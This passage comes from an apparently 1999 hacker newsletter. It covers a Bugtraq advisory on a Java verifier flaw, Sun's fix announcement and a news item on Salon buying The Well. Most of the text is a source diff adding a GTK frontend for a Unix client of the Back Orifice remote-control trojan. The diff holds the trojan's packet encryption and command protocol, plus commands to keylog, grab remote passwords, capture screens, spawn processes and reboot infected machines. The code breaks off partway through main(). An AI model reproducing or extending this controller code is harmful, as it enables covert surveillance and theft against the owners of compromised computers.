JVM. Exploiting the flaw allows the attacker to run code that has not been verified. This code can set up a type confusion attack (see our book "Securing Java" for details http://www.securingjava.com) which leads to a full-blown security breach. We have verified that the flaw exists and is serious. Attack code (in both applet and application form) has been developed in the lab to exploit the flaw. Sun and Netscape have been notified about the flaw and they are working on a fix. The attack we developed in the lab worked against the following platforms: JDK 1.1.5 (Solaris) JDK 1.2beta4 (Solaris) JDK 1.1.6 (Solaris) JDK 1.1.7 (FreeBSD) JDK 1.2 (NT) JDK 1.1.6 (NT) Symantec Visual Cafe Version 3 Netscape 4.5 (FreeBSD) Netscape 4.5 (NT) Netscape 4.05 (NT) Netscape 4.02 (Solaris) Netscape 4.07 (Linux) The attack did not work against: Microsoft Visual J++ 6.0 Kudos to Viren Shah at RST for extensive platform testing. Thanks for your interest in mobile code security. Dr. Gary McGraw Prof. Edward W. Felten Reliable Software Technologies Secure Internet Programming Lab gem@rstcorp.com Dept. of Computer Science Princeton University http://www.securingjava.com felten@cs.princeton.edu --------------------------------------------------------------------------- Date: Mon, 5 Apr 1999 11:13:16 -0700 From: d3l1r1um@gothlet.net To: BUGTRAQ@netspace.org Subject: Re: Security Hole in Java 2 (and JDK 1.1.x) The following is the URL for a press release Sun issued about this: http://java.sun.com/pr/1999/03/pr990329-01.html It says the fix is in the works and will be available shortly, and will be implemented in the next release(s) of the software (due in April). FYI. d3l1r1um. SUN SET TO DELIVER SOFTWARE FIX FOR JAVATM DEVELOPMENT KIT SECURITY BUG PALO ALTO, Calif. -- March 26, 1999 -- Sun Microsystems, Inc. today announced it has created a fix to a newly discovered implementation bug in the JavaTM Development Kit (JDKTM) that affects both JDK 1.1.x and the Java 2 platform. The bug poses a potential security risk by allowing an untrusted applet to execute unverified code under certain circumstances. There are no reports of any attacks based on this bug. After being briefed on the bug, Sun created and tested a fix. Releases of the patch for all Java 1.1.x platforms and the Java 2 platform are imminent. The fix will also be available as a part of JDK 1.1.8 and Java 2, v 1.2.1, both scheduled for release in April. The bug was discovered by a German graduate student as part of a research project and was reported to Sun on March 11, 1999 by Ed Felton, who heads the Princeton University Secure Internet Programming Lab. "It is important to keep in mind that this is an implementation bug and not a flaw in the basic Java platform security model or architecture," said Jon Kannegaard, Vice President and General Manager, Java Platform at Sun Microsystems Java Software. "We invite scrutiny from the Internet community and publish our source code so that the community will be able to analyze our security implementations and give us valuable feedback on the architecture and our implementation. We firmly believe that this is the best way to evolve the Java platform security model in this spirit of openness." Kannegaard continued, "Sun takes every security-related implementation flaw in Java code very seriously and we thank the Princeton team for their contribution to the Java platform." For more information, please see http://java.sun.com/sfaq. @HWA 39.0 Salon buys The Well ~~~~~~~~~~~~~~~~~~~ Salon Buys The Well Wired News Report 9:10 a.m. 7.Apr.99.PDT Internet magazine Salon has acquired The Well, one of the Net's oldest and most respected online communities. The surprise move, announced Tuesday, gives Salon a dose of new credibility by tying it directly into a members-only community of scores of artists, writers, thinkers, scientists, programmers, and visionaries. Salon said the company intends to operate the Sausalito, California company as a separate business. Terms of the deal were not disclosed. Well executive director Gail Williams said the deal does not include Well Engaged Discussions Server, which remains a separate business owned by former Well parent Rosewood Stone Group. That proprietary software allows Picospan, the Well's underlying discussion thread software, to be viewable on the Web. "The Well will provide Salon with new revenue sources, in addition to our advertising, e-commerce, and syndication business," said Salon president and publisher Michael O'Donnell in a statement. Logic would dictate that Well Engaged would likely replace the clunky software platform underlying TableTalk, Salon's existing discussion forum area. But Salon spokesperson Dayna Macy flatly denies this will occur. Still, the deal is really about tapping the credibility of a Net institution. "The main thing about The Well is not the Web interface, it's the old fashioned text interface," said David Gans, who has been a member of The Well since 1986. "I hope that they don't do anything to make it harder for us old guard to use that." Gans said that many members of Salon's staff, including vice president and senior editor Scott Rosenberg, and author and reporter Andrew Leonard, are longtime Wellheads. "They are not the kind of people who are going to come in and make lots of changes just because they can." Gans said that many Well members were dissatisfied with the service's current owner, Bruce Katz, and would likely embrace the new parent. He said that Well CEO Katz had been trying to sell The Well for years, but had been asking for too much money. "If we are going to be bought by someone, Salon seems as good as anyone to do it." Other Wellheads seemed pleased, and a discussion raged on a topic in one of the service's conferences. "I think it could be very promising," said Reva Basch, a Wellhead since 1988. "One of the big questions in my mind is where are the deep pockets? But culturally and conceptually it could be really interesting," said Basch. Well director Williams played down persistant rumors that the service's selling price had been overinflated. "The popular perception is different than the business perception," Williams said. "How many businesses on the Web have as strong an identification and revenue [as the Well has]?" "We're dancing on our keyboards over here," Williams said. In a prepared statement, Salon's founder described a match made in heaven. "The Well's distinctive reputation for thoughtful and intelligent online discussions fits strongly with our network of high-quality content sites and our existing community, Table Talk," said David Talbot. The Well has come to be an intellectual safe-haven for many of the leading thinkers of the digital age. Editor's Note: This story has been corrected. The original report speculated that Well Engaged software could possibly replace the Salon discussion area known as Table Talk. In fact, that platform can only replace the software underlying that discussion forum, and not the forum itself. Wired News regrets the error. @HWA 40.0 Gspot bounix frontend enhancement/replacement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ diff -ruN bo/Makefile.in bo_gspot/Makefile.in --- bo/Makefile.in Sun Aug 9 14:12:02 1998 +++ bo_gspot/Makefile.in Tue Mar 23 17:36:01 1999 @@ -2,11 +2,14 @@ LIBS=@LIBS@ INSTALL=@INSTALL@ -all: bounix +prefix=/usr/local/bin + +all: bounix gspot clean: - rm *.o bounix + rm *.o bounix gspot install: - $(INSTALL) bounix /usr/local/bin/bounix + $(INSTALL) bounix $(prefix)/bounix + $(INSTALL) gspot $(prefix)/gspot distclean: rm *.o bounix config.status config.cache config.log config.h Makefile .o: @@ -14,3 +17,6 @@ bounix: bounix.o commands.o help.o $(CC) -o bounix bounix.o commands.o help.o $(LIBS) + +gspot: commands.o gspot.c + $(CC) -g -o gspot gspot.c commands.o $(LIBS) `gtk-config --libs` `gtk-config --cflags` diff -ruN bo/gspot.c bo_gspot/gspot.c --- bo/gspot.c Wed Dec 31 16:00:00 1969 +++ bo_gspot/gspot.c Tue Mar 23 16:36:04 1999 @@ -0,0 +1,891 @@ +#include "config.h" +#include "bounix.h" +#include "helpstrings.h" +#include + +// Do you have anything to declare? +#define PROBE_STR_MAX 30 + +typedef struct { + gchar *Name[1]; //Odd? Yes, but gotta do it for Clist + gchar command[PROBE_STR_MAX + 1]; + gchar firstArg[PROBE_STR_MAX + 1]; + gchar secondArg[PROBE_STR_MAX + 1]; +} probeListItem; + +// Function prototypes +void insertProbe (gchar *Name, gchar *bocommand, gchar *arg1, gchar *arg2); +void initializeProbes (void); +void destroy (GtkWidget *widget, gpointer data); +void update_value(GtkWidget *widget, gpointer data); +void select_probe (GtkWidget *widget, gint row, gint column, GdkEventButton *event, gpointer data); +void gtk_puts (gchar *message); +void givehelpcommand(char *arg1); +void helpDialog (GtkWidget *widget, gpointer data); +gint main( int argc, char *argv[] ); + +// Globals +gchar currentProbe[PROBE_STR_MAX + 1]; +gchar responce[BUFFSIZE + 1]; +gchar oldhost[ARGSIZE + 1]; +gchar oldport[6]; +gint pidx = 0; +probeListItem *probeArray; +GtkWidget *returnScreen; +GtkWidget *rsScroll; +GtkWidget *hostText, *portText, *arg1Text, *arg2Text, *passText; +GtkWidget *arg1Label, *arg2Label; +// From bounix.c +int udpsock; +int port = PORT; +int g_lastpongport; +unsigned long host; +unsigned long g_lastpongip; +unsigned long g_packet; +static long holdrand = 1L; +struct sockaddr_in sockaddr; +struct in_addr hostin; +char g_password[ARGSIZE + 1]; +char g_lastdata[BUFFSIZE + 1]; +char cwd[MAX_PATH + 1]; +char buff[BUFFSIZE + 1]; + + + +// Look! Actual code! + +void msrand (unsigned int seed ) +{ + holdrand = (long)seed; +} + +int mrand ( void) +{ + return(((holdrand = holdrand * 214013L + 2531011L) >> 16) & 0x7fff); +} + +unsigned int getkey() +{ + int x, y; + unsigned int z; + + y = strlen(g_password); + if (!y) + return 31337; + else { + z = 0; + for (x = 0; x < y; x++) + z+= g_password[x]; + + for (x = 0; x < y; x++) + { + if (x%2) + z-= g_password[x] * (y-x+1); + else + z+= g_password[x] * (y-x+1); + z = z%RAND_MAX; + } + z = (z * y)%RAND_MAX; + return z; + } +} + +void BOcrypt(unsigned char *buff, int len) +{ + int y; + + if (!len) + return; + + msrand(getkey()); + for (y = 0; y < len; y++) + buff[y] = buff[y] ^ (mrand()%256); +} + +/* + * I/O socket functions + */ + +int getpong(int sock) /* loops through with select, returns 0 on correct ping response */ +{ /* and 1 on a timeout or select error. */ + struct sockaddr_in host; + char buff[BUFFSIZE]; + int hostsize, x, sel; + unsigned long *pdw; + unsigned char *ptr; + unsigned long packetsize; + unsigned char type; + fd_set fds; + struct timeval tv; + + FD_ZERO(&fds); + FD_SET(sock, &fds); + tv.tv_sec = 0; + tv.tv_usec = 0; + hostsize = sizeof(host); + + while ( (sel = select(sock+1, &fds, NULL, NULL, &tv)) > 0) + { + tv.tv_sec=0; + tv.tv_usec=0; + + if ( (x = recvfrom(sock, buff, BUFFSIZE, 0, (struct sockaddr *)&host, &hostsize)) <= 0 ) { + return(1); + } + + BOcrypt(buff, x); + + if ( strncmp(buff, MAGICSTRING, MAGICSTRINGLEN) != 0) + { + sprintf(responce, "------- Garbage packet recieved from %s port %d -------\n", + inet_ntoa(host.sin_addr), + (int)ntohs(host.sin_port) ); + gtk_puts(responce); + continue; + } + pdw = (unsigned long *)buff; + pdw+=2; + packetsize = __EL_LONG(*pdw); + pdw+=2; + ptr = (unsigned char *)pdw; + type = *ptr++; + + if (!(type & PARTIAL_PACKET) && !(type & CONTINUED_PACKET ) && + (type == TYPE_PING)) + { + sprintf(responce, "---- Pong received from %s port %d ---\n", + inet_ntoa(host.sin_addr), + (int)ntohs(host.sin_port) ); + gtk_puts(responce); + gtk_puts(ptr); + sprintf(responce, "---------- End of data ----------------------\n"); + gtk_puts(responce); + g_lastpongip = host.sin_addr.s_addr; + g_lastpongport = (int)ntohs(host.sin_port); + return(0); + } else { + sprintf(responce, "---- Non pong response from %s port %d ---\n", + inet_ntoa(host.sin_addr), + (int)ntohs(host.sin_port) ); + gtk_puts(responce); + gtk_puts(ptr); + sprintf(responce, "---------- End of data ---------------------\n"); + gtk_puts(responce); + continue; + } + } + if (sel < 0) + perror("select"); + + return(1); +} + +int getinput(int sock) +{ + struct sockaddr_in host; + char buff[BUFFSIZE]; + int hostsize, x, sel; + unsigned long *pdw; + unsigned char *ptr; + unsigned long packetsize; + unsigned long oldestpack, lastpacket, packetid, p; + unsigned char type; + struct timeval tv; + fd_set fds; + + FD_ZERO(&fds); + FD_SET(sock, &fds); + tv.tv_sec = 10; + tv.tv_usec = 0; + hostsize = sizeof(host); + + while( (sel = select(sock+1, &fds, NULL, NULL, &tv)) > 0 ) + { + tv.tv_sec = 10; /* check, does select modify tv? */ + tv.tv_usec = 0; + + if ( (x = recvfrom(sock, buff, BUFFSIZE, 0, (struct sockaddr *)&host, + &hostsize)) <= 0) + continue; /* this still shouldnt happen */ + + BOcrypt(buff, x); + if ( strncmp(buff, MAGICSTRING, MAGICSTRINGLEN) != 0) + continue; /* this packet isnt for us, pass off */ + + pdw = (unsigned long *)buff; /* parse out the packet */ + pdw+=2; + packetsize = *pdw++; + packetsize = __EL_LONG(packetsize); + packetid = *pdw++; + packetid = __EL_LONG(packetid); + ptr = (unsigned char *)pdw; + type = *ptr++; + + /* this is a singular packet */ + if (!(type & PARTIAL_PACKET) && !(type & CONTINUED_PACKET ) ) + { + sprintf(responce, "---- Packet received from %s port %d -----\n", + inet_ntoa(host.sin_addr), + (int)ntohs(host.sin_port) ); + gtk_puts(responce); + gtk_puts(ptr); + sprintf(responce, "---------- End of data ---------------------\n"); + gtk_puts(responce); + return 0; /* success */ + } + + /* first packet in a set of packets */ + if (!(type & CONTINUED_PACKET)) + { + oldestpack = packetid; + sprintf(responce, "---- Packet received from %s port %d -----\n", + inet_ntoa(host.sin_addr), + (int)ntohs(host.sin_port) ); + gtk_puts(responce); + } + + if(type & CONTINUED_PACKET) /* if we're here, i believe this will always be true */ + { + /* if packetid = lastpacket+1 (normal), this doesnt run */ + + /* This code is B00l Shit. It's borken big time. + for(p=lastpacket; packetid > lastpacket+1; p++) + printf("Packet #%d in this collection is MIA\n", (int)(p-oldestpack)); + */ + lastpacket = packetid; + } + + gtk_puts(ptr); + + /* last packet in a set of packets */ + if (!(type & PARTIAL_PACKET)) + { + sprintf(responce, "---------- End of data ---------------------\n"); + gtk_puts(responce); + return 0; /* success */ + } + } + + /* determine why we broke out of the loop */ + if (sel == 0) { + sprintf(responce, "Timeout on wait, host may not be reachable, or no server installed\n"); + gtk_puts(responce); + } + else if (sel < 0) + perror("select"); + + return(1); /* error */ +} + + +int sendping(unsigned long dest, int port, int sock) +{ + unsigned char *ptr; + unsigned long *pdw; + unsigned long size; + struct sockaddr_in host; + char buff[BUFFSIZE]; + int i; + fd_set fdset; + struct timeval tv; + + size = MAGICSTRINGLEN + (sizeof(unsigned long)*2) + 2; + strcpy(buff, MAGICSTRING); + pdw = (unsigned long *)(buff + MAGICSTRINGLEN); + *pdw++ = __EL_LONG(size); + *pdw++ = __EL_LONG((unsigned long)-1); + ptr = (unsigned char *)pdw; + *ptr++ = TYPE_PING; + *ptr = 0; + + BOcrypt(buff, (int)size); + + host.sin_family = AF_INET; + host.sin_port = htons((u_short)port); + host.sin_addr.s_addr = dest; + + FD_ZERO(&fdset); + FD_SET(sock, &fdset); + tv.tv_sec = 10; + tv.tv_usec = 0; + + i = select(sock+1, NULL, &fdset, NULL, &tv); + if (i == 0) + { + sprintf(responce, "Timeout waiting to send to socket\n"); + gtk_puts(responce); + return(1); + } else if (i < 0) { + perror("select: "); + return(1); + } + + if ( (sendto(sock, buff, size, 0, (struct sockaddr *)&host, sizeof(host))) != size ) + { + perror("sendto: "); + return(1); + } + + return 0; +} + +int sendpacket(unsigned char type, const char *str1, const char *str2, unsigned long dest, int port, int sock) +{ + unsigned char *ptr; + unsigned long *pdw; + unsigned long size; + struct sockaddr_in host; + char buff[BUFFSIZE]; + + if (dest == 0) + { + gtk_puts("Set a target host with the 'host' command. (Type 'help' for assistance)"); + return 1; + } + /* 4 4 1 ? ? 1 + * ----------------------------------------------- + * |MAGICSTRING|size|pakt|t|arg1... |arg2... |crc| + * | | |num | | | | | + * ----------------------------------------------- + */ + size = MAGICSTRINGLEN + (sizeof(long)*2) + 3 + strlen(str1) + strlen(str2); + strcpy(buff, MAGICSTRING); + pdw = (unsigned long *)(buff + MAGICSTRINGLEN); + *pdw++ = __EL_LONG(size); + *pdw++ = __EL_LONG(g_packet); + g_packet++; + ptr = (unsigned char *)pdw; + *ptr++ = type; + strcpy(ptr, str1); + ptr += strlen(str1) + 1; + strcpy(ptr, str2); + + BOcrypt(buff, (int)size); + + host.sin_family = AF_INET; + host.sin_port = htons((u_short)port); + host.sin_addr.s_addr = dest; + + if ( (sendto(sock, buff, size, 0, (struct sockaddr *)&host, sizeof(host))) != size) + { + perror("sendto: "); + return(1); + } + return 0; +} + + +/************************** MISC FUNCTIONS **************************/ + +void fixfilename(char *buff, const char *cwd, const char *path) +{ + if (path[0] == '\\') + { + strncpy(buff, cwd, 2); + strncpy(buff+3, path, strlen(path)+1); + } else if (strncmp(path+1, ":\\", 2) == 0){ + strcpy(buff, path); + } else { + sprintf(buff, "%s%s", cwd, path); + } +} + +void execute(GtkWidget *widget, gpointer data) +{ + if ( host == 0 || // We don't have a host? Must be the first time... + (strcmp(oldhost, gtk_entry_get_text(GTK_ENTRY(hostText))) || + strcmp(oldport, gtk_entry_get_text(GTK_ENTRY(portText))) ) ) // The hostname or port was changed + { + executecommand("HOST", gtk_entry_get_text(GTK_ENTRY(hostText)), + gtk_entry_get_text(GTK_ENTRY(portText))); + if ( host == 0 ) + { + gtk_puts("Resolver said: \"Eat me\"\n I think you should check your hostname/port."); + gtk_entry_set_text(GTK_ENTRY(hostText), oldhost); + gtk_entry_set_text(GTK_ENTRY(portText), oldport); + return; + } + //We've a host now. + strcpy(oldhost, gtk_entry_get_text(GTK_ENTRY(hostText)) ); + strcpy(oldport, gtk_entry_get_text(GTK_ENTRY(portText)) ); + } + if (currentProbe[0] == 0) + { + gtk_puts("Please click on one of the commands.\n I know it looks like ping is selected, but it isn't."); + } + if (executecommand(currentProbe, + gtk_entry_get_text(GTK_ENTRY(arg1Text)), + gtk_entry_get_text(GTK_ENTRY(arg2Text)) )) + { + sprintf(responce, "Command Failed\n"); + gtk_puts(responce); + } +} + + + + +//----------------------------------------------- +// GKT code below +//----------------------------------------------- + + + +void insertProbe (gchar *Name, gchar *bocommand, gchar *arg1, gchar *arg2) +{ + if (!probeArray) + { + probeArray = malloc(sizeof(probeListItem)); + } + else + { + probeArray = realloc(probeArray, (sizeof(probeListItem) * (pidx+1)) ); + } + probeArray[pidx].Name[0] = malloc(sizeof(gchar) * strlen(Name) + 1); + strcpy(probeArray[pidx].Name[0], Name); + strcpy(probeArray[pidx].command, bocommand); + strcpy(probeArray[pidx].firstArg, arg1); + strcpy(probeArray[pidx].secondArg, arg2); + pidx++; + +} + +void initializeProbes (void) +{ + // I've taken a few out, they aren't neccessary with a GUI + // insertProbe("HOST", "", ""); + // insertProbe("QUIT", "", ""); + // insertProbe("PASSWD", "", ""); + // BO commands + insertProbe("Ping", "PING", "Unused:", "Unused:"); + insertProbe("Ping List", "PINGLIST", "File Name:", "Unused:"); + insertProbe("Sweep subnet", "SWEEP", "Subnet:", "Unused:"); + insertProbe("Sweep List", "SWEEPLIST", "File Name:", "Unused:"); + // File operations + insertProbe("List dir", "DIR", "File pattern:", "Unused:"); + insertProbe("Find file", "FIND", "File pattern:", "Start in:"); + insertProbe("View file", "VIEW", "File name:", "Unused:"); + insertProbe("Delete file", "DEL", "File:", "Unused:"); + insertProbe("Copy file", "COPY", "Source filename:", "Destination:"); + insertProbe("Rename file", "REN", "File name:", "Destination:"); + insertProbe("Compress file", "FREEZE", "Freeze file:", "Destination:"); + insertProbe("Uncompress file", "MELT", "Frozen file:", "Destination:"); + // Dir operations + insertProbe("Change dir", "CD", "New directory:", "Unused:"); + insertProbe("Make directory", "MD", "New dir:", "Unused:"); + insertProbe("Remove directory", "RD", "Directory:", "Unused:"); + // insertProbe("Download file", "GET", "Remote filename:", "Local filename:"); Apparently these two + // insertProbe("Upload file", "PUT", "Local filename:", "Remote filename:"); weren't implemented + // System operations + // insertProbe("Open Shell", "SHELL", "Unused:", "Unused:"); Also not implemented + // insertProbe("Get status", "STATUS", "Unused:", "Unused:"); Status is useless to me + insertProbe("Get system info", "INFO", "Unused:", "Unused:"); + insertProbe("Get remote passwords", "PASSES", "Unused:", "Unused:"); + insertProbe("Create system dialog", "DIALOG", "Dialog text:", "Title text:"); + insertProbe("Keylog", "KEYLOG", "Log File: (or stop)", "Unused:"); + insertProbe("List processes", "PROCLIST", "Unused:", "Unused:"); + insertProbe("Kill process", "PROCKILL", "Process ID:", "Unused:"); + insertProbe("Start process", "PROCSPAWN", "Commandline:", "Unused:"); + insertProbe("Lockup system", "LOCKUP", "Unused:", "Unused:"); + insertProbe("Reboot system", "REBOOT", "Unused:", "Unused:"); + // Network stuff + insertProbe("Resolve hostname", "RESOLVE", "Hostname:", "Unused:"); + insertProbe("List IP redirects", "REDIRLIST", "Unused:", "Unused:"); + insertProbe("Delete IP redirect", "REDIRDEL", "Redir Number:", "Unused:"); + insertProbe("Add IP redirect", "REDIRADD", "Input Port:", "Output IP:Port,UDP:"); + insertProbe("List console apps", "APPLIST", "Unused:", "Unused:"); + insertProbe("Remove console app", "APPDEL", "App ID:", "Unused:"); + insertProbe("Add console app", "APPADD", "Program:", "Port:"); + insertProbe("List available resources", "NETVIEW", "Unused:", "Unused:"); + insertProbe("List connected resources", "NETLIST", "Unused:", "Unused:"); + insertProbe("Disconnect resource", "NETDISCONNECT", "Resource:", "Unused:"); + insertProbe("Connect to resource", "NETCONNECT", "Resource:", "Password:"); + insertProbe("List shares", "SHARELIST", "Unused:", "Unused:"); + insertProbe("Delete shares", "SHAREDEL", "Share name:", "Unused:"); + insertProbe("Add shares", "SHAREADD", "Share name:", "Local dir,Password,remark:"); + insertProbe("Stop HTTP server", "HTTPOFF", "Unused:", "Unused:"); + insertProbe("Start HTTP server", "HTTPON", "Port:", "Root:"); + insertProbe("Send file via TCP", "TCPSEND", "File name:", "Target IP:Port"); + insertProbe("Recieve file via TCP", "TCPRECV", "File name:", "Target IP:Port"); + // Multimedia stuff + insertProbe("List MM capture devices", "LISTCAPS", "Unused:", "Unused:"); + insertProbe("Capture bitmap", "CAPSCREEN", "File name:", "Unused:"); + insertProbe("Capture frame from MM", "CAPFRAME", "File name:", "Device,Width,Height,Bits:"); + insertProbe("Capture AVI", "CAPAVI", "File name:", "Seconds,Device,Width,Height,Bits:"); + insertProbe("Play wav file", "SOUND", "File name;", "Unused:"); + // Registry + insertProbe("List registry subkeys", "REGLISTKEYS", "Keyname:", "Unused:"); + insertProbe("List registry values", "REGLISTVALS", "Keyname:", "Unused:"); + insertProbe("Delete registry key", "REGDELKEY", "Keyname:", "Unused:"); + insertProbe("Make registry key", "REGMAKEKEY", "Keyname:", "Unused:"); + insertProbe("Delete registry value", "REGDELVAL", "Value name:", "Unused:"); + insertProbe("Set registry value", "REGSETVAL", "Value name:", "Type,Value:"); + // Plugins + insertProbe("List plugins", "PLUGINLIST", "Unused:", "Unused:"); + insertProbe("Stop plugin", "PLUGINKILL", "Plugin ID:", "Unused:"); + insertProbe("Execute plugin", "PLUGINEXEC", "DLL name:Plugin name:", "Plugin args"); + + probeArray = realloc(probeArray, sizeof(probeListItem) * (pidx+1) ); +} + +void destroy (GtkWidget *widget, gpointer data) +{ + if(probeArray) { + pidx = 0; + while ( probeArray[pidx].Name[0] != NULL ) { + free(probeArray[pidx].Name[0]); + pidx++; + } + free(probeArray); + probeArray = NULL; + } + close(udpsock); + gtk_main_quit (); +} + + +void update_value(GtkWidget *widget, gpointer data) +{ + // Right now, passText is the only widget that calls us. + //if ( strcasecmp("passText", gtk_widget_get_name( GTK_WIDGET(widget) )) == 0 ) + strcpy(g_password, gtk_entry_get_text(GTK_ENTRY(widget))); +} + + +void select_probe (GtkWidget *widget, gint row, gint column, GdkEventButton *event, gpointer data) +{ + strcpy(currentProbe, probeArray[row].command); + gtk_label_set(GTK_LABEL(arg1Label), probeArray[row].firstArg); + gtk_label_set(GTK_LABEL(arg2Label), probeArray[row].secondArg); +} + +void gtk_puts (gchar *message) +{ + gtk_text_insert( GTK_TEXT(returnScreen),NULL,NULL,NULL,message,-1); + if(message[strlen(message)-1] != '\n') + gtk_text_insert( GTK_TEXT(returnScreen),NULL,NULL,NULL,"\n",-1); +} + +void givehelpcommand(char *arg1) +{ + helpDialog(NULL, arg1); +} + +void helpDialog (GtkWidget *widget, gpointer data) +{ + GtkWidget *helpWindow; + GtkWidget *button; + GtkWidget *label; + char labelTemp[10]; + + helpWindow = gtk_dialog_new (); + gtk_container_border_width (GTK_CONTAINER (helpWindow), 10); + + button = gtk_button_new_with_label("OK"); + gtk_signal_connect_object (GTK_OBJECT (button), "clicked", + GTK_SIGNAL_FUNC (gtk_widget_destroy), GTK_OBJECT (helpWindow)); + gtk_box_pack_start (GTK_BOX (GTK_DIALOG (helpWindow)->action_area), button, + TRUE, TRUE, 0); + gtk_widget_show (button); + + if (strlen((char *) data) == 0) label = gtk_label_new("Select an item first"); + else if (strcasecmp((char *) data, "HOST") == 0) label = gtk_label_new(hosthelp); + else if (strcasecmp((char *) data, "QUIT") == 0) label = gtk_label_new(quithelp); + else if (strcasecmp((char *) data, "PING") == 0) label = gtk_label_new(pinghelp); + else if (strcasecmp((char *) data, "PINGLIST") == 0) label = gtk_label_new(pinglisthelp); + else if (strcasecmp((char *) data, "SWEEP") == 0) label = gtk_label_new(sweephelp); + else if (strcasecmp((char *) data, "SWEEPLIST") == 0) label = gtk_label_new(sweeplisthelp); + else if (strcasecmp((char *) data, "SHELL") == 0) label = gtk_label_new(shellhelp); + else if (strcasecmp((char *) data, "STATUS") == 0) label = gtk_label_new(statushelp); + else if (strcasecmp((char *) data, "PASSWD") == 0) label = gtk_label_new(passwdhelp); + else if (strcasecmp((char *) data, "DIR") == 0) label = gtk_label_new(dirhelp); + else if (strcasecmp((char *) data, "CD") == 0) label = gtk_label_new(cdhelp); + else if (strcasecmp((char *) data, "DEL") == 0) label = gtk_label_new(delhelp); + else if (strcasecmp((char *) data, "GET") == 0) label = gtk_label_new(gethelp); + else if (strcasecmp((char *) data, "PUT") == 0) label = gtk_label_new(puthelp); + else if (strcasecmp((char *) data, "COPY") == 0) label = gtk_label_new(copyhelp); + else if (strcasecmp((char *) data, "FIND") == 0) label = gtk_label_new(findhelp); + else if (strcasecmp((char *) data, "FREEZE") == 0) label = gtk_label_new(freezehelp); + else if (strcasecmp((char *) data, "MELT") == 0) label = gtk_label_new(melthelp); + else if (strcasecmp((char *) data, "VIEW") == 0) label = gtk_label_new(viewhelp); + else if (strcasecmp((char *) data, "REN") == 0) label = gtk_label_new(renhelp); + else if (strcasecmp((char *) data, "MD") == 0) label = gtk_label_new(mdhelp); + else if (strcasecmp((char *) data, "RD") == 0) label = gtk_label_new(rdhelp); + else if (strcasecmp((char *) data, "INFO") == 0) label = gtk_label_new(infohelp); + else if (strcasecmp((char *) data, "PASSES") == 0) label = gtk_label_new(passeshelp); + else if (strcasecmp((char *) data, "DIALOG") == 0) label = gtk_label_new(dialoghelp); + else if (strcasecmp((char *) data, "KEYLOG") == 0) label = gtk_label_new(keyloghelp); + else if (strcasecmp((char *) data, "REBOOT") == 0) label = gtk_label_new(reboothelp); + else if (strcasecmp((char *) data, "NETVIEW") == 0) label = gtk_label_new(netviewhelp); + else if (strcasecmp((char *) data, "NETCONNECT") == 0) label = gtk_label_new(netconnecthelp); + else if (strcasecmp((char *) data, "NETDISCONNECT") == 0) label = gtk_label_new(netdisconnecthelp); + else if (strcasecmp((char *) data, "NETLIST") == 0) label = gtk_label_new(netlisthelp); + else if (strcasecmp((char *) data, "RESOLVE") == 0) label = gtk_label_new(resolvehelp); + else if (strcasecmp((char *) data, "SHARELIST") == 0) label = gtk_label_new(sharelisthelp); + else if (strcasecmp((char *) data, "SHAREADD") == 0) label = gtk_label_new(shareaddhelp); + else if (strcasecmp((char *) data, "SHAREDEL") == 0) label = gtk_label_new(sharedelhelp); + else if (strcasecmp((char *) data, "PROCLIST") == 0) label = gtk_label_new(proclisthelp); + else if (strcasecmp((char *) data, "PROCKILL") == 0) label = gtk_label_new(prockillhelp); + else if (strcasecmp((char *) data, "PROCSPAWN") == 0) label = gtk_label_new(procspawnhelp); + else if (strcasecmp((char *) data, "LISTCAPS") == 0) label = gtk_label_new(listcapshelp); + else if (strcasecmp((char *) data, "CAPSCREEN") == 0) label = gtk_label_new(capscreenhelp); + else if (strcasecmp((char *) data, "CAPFRAME") == 0) label = gtk_label_new(capframehelp); + else if (strcasecmp((char *) data, "CAPAVI") == 0) label = gtk_label_new(capavihelp); + else if (strcasecmp((char *) data, "SOUND") == 0) label = gtk_label_new(soundhelp); + else if (strcasecmp((char *) data, "REDIRLIST") == 0) label = gtk_label_new(redirlisthelp); + else if (strcasecmp((char *) data, "REDIRDEL") == 0) label = gtk_label_new(redirdelhelp); + else if (strcasecmp((char *) data, "REDIRADD") == 0) label = gtk_label_new(rediraddhelp); + else if (strcasecmp((char *) data, "APPADD") == 0) label = gtk_label_new(appaddhelp); + else if (strcasecmp((char *) data, "APPDEL") == 0) label = gtk_label_new(appdelhelp); + else if (strcasecmp((char *) data, "APPLIST") == 0) label = gtk_label_new(applisthelp); + else if (strcasecmp((char *) data, "REGMAKEKEY") == 0) label = gtk_label_new(regmakekeyhelp); + else if (strcasecmp((char *) data, "REGDELKEY") == 0) label = gtk_label_new(regdelkeyhelp); + else if (strcasecmp((char *) data, "REGLISTKEYS") == 0) label = gtk_label_new(reglistkeyshelp); + else if (strcasecmp((char *) data, "REGLISTVALS") == 0) label = gtk_label_new(reglistvalshelp); + else if (strcasecmp((char *) data, "REGDELVAL") == 0) label = gtk_label_new(regdelvalhelp); + else if (strcasecmp((char *) data, "REGSETVAL") == 0) label = gtk_label_new(regsetvalhelp); + else if (strcasecmp((char *) data, "HTTPON") == 0) label = gtk_label_new(httponhelp); + else if (strcasecmp((char *) data, "HTTPOFF") == 0) label = gtk_label_new(httpoffhelp); + else if (strcasecmp((char *) data, "TCPSEND") == 0) label = gtk_label_new(tcpsendhelp); + else if (strcasecmp((char *) data, "TCPRECV") == 0) label = gtk_label_new(tcprecvhelp); + else if (strcasecmp((char *) data, "LOCKUP") == 0) label = gtk_label_new(lockuphelp); + else if (strcasecmp((char *) data, "PLUGINEXEC") == 0) label = gtk_label_new(pluginexechelp); + else if (strcasecmp((char *) data, "PLUGINKILL") == 0) label = gtk_label_new(pluginkillhelp); + else if (strcasecmp((char *) data, "PLUGINLIST") == 0) label = gtk_label_new(pluginlisthelp); + else { + snprintf ( labelTemp, 10, "No help for '%s'\n", (char *) data); + label = gtk_label_new(labelTemp); + } + + gtk_box_pack_start (GTK_BOX (GTK_DIALOG (helpWindow)->vbox), label, TRUE, + TRUE, 0); + gtk_widget_show (label); + gtk_widget_show (helpWindow); + +} + +int main( int argc, char *argv[] ) +{ + int clientport = 0; + struct linger linger; + int bufsize; + GtkWidget *window; + GtkWidget *kitchenTable; + GtkWidget *hbox, *vbox; +#if GTK_MINOR_VERSION >= 2 + GtkWidget *probeScroll; +#endif + GtkWidget *probeList; + GtkWidget *helpBUTTon, *exeBUTTon; + GtkWidget *hostLabel, *portLabel, *passLabel; + // As a reminder, the following components are global: + /* + GtkWidget *returnScreen; + GtkWidget *rsScroll; + GtkWidget *hostText, *portText, *arg1Text, *arg2Text, *passText; 